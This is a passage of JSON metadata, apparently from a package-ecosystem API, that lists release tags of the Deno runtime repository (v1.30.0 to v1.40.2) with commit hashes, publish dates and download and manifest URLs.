/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tag